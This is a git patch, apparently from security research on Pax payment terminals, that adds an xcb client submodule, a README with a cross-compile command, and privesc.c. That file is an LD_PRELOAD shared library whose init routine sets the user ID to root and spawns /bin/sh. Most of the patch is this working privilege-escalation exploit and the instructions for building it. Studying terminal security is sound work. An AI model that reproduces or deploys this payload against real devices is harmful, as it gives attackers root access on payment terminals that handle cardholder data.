From 499c1e91e8c0ea41fce4c0c79e802a739244e6f2 Mon Sep 17 00:00:00 2001
From: Giulio <giulio@gmx.com>
Date: Mon, 1 Jun 2020 10:15:17 +0200
Subject: [PATCH] Added privesc code and xcb-client

---
 .gitmodules            |  3 +++
 code/Readme.md         | 12 ++++++++++++
 code/privesc.c         | 14 ++++++++++++++
 code/prolin-xcb-client |  1 +
 4 files changed, 30 insertions(+)
 create mode 100644 .gitmodules
 create mode 100644 code/Readme.md
 create mode 100644 code/privesc.c
 create mode 160000 code/prolin-xcb-client

diff --git a/.gitmodules b/.gitmodules
new file mode 100644
index 0000000..fecd6a1
--- /dev/null
+++ b/.gitmodules
@@ -0,0 +1,3 @@
+[submodule "code/prolin-xcb-client"]
+	path = code/prolin-xcb-client
+	url = https://git.lsd.cat/g/prolin-xcb-client
diff --git a/code/Readme.md b/code/Readme.md
new file mode 100644
index 0000000..eda995f
--- /dev/null
+++ b/code/Readme.md
@@ -0,0 +1,12 @@
+## prolin-xcb-tools
+Python-ADB fork in order to communicate with the Pax `xcbd` daemon. Supports natively directory listing, reading and writing. Port forwarding may be done trough the original `xcb` client.
+
+## privesc.c
+The shared library used for privilege escalation.
+
+Compile with:
+
+```
+arm-none-eabi-gcc -shared -fPIC -o privesc.so privesc.c -nostartfiles -static
+```
+
diff --git a/code/privesc.c b/code/privesc.c
new file mode 100644
index 0000000..eb815de
--- /dev/null
+++ b/code/privesc.c
@@ -0,0 +1,14 @@
+#include <stdio.h>
+#include <sys/types.h>
+#include <stdlib.h>
+#include <unistd.h>
+
+int _init() {
+        unsetenv("LD_PRELOAD");
+        puts("LD_PRELOAD is working!");
+        setreuid(0, 0);
+        setuid(0);
+        printf("UID: %d. EUID: %d.\n", getuid(), geteuid());
+        system("/bin/sh");
+        exit(0);
+}
diff --git a/code/prolin-xcb-client b/code/prolin-xcb-client
new file mode 160000
index 0000000..8d00509
--- /dev/null
+++ b/code/prolin-xcb-client
@@ -0,0 +1 @@
+Subproject commit 8d00509ab221200388da9be68f406c7982f9cf60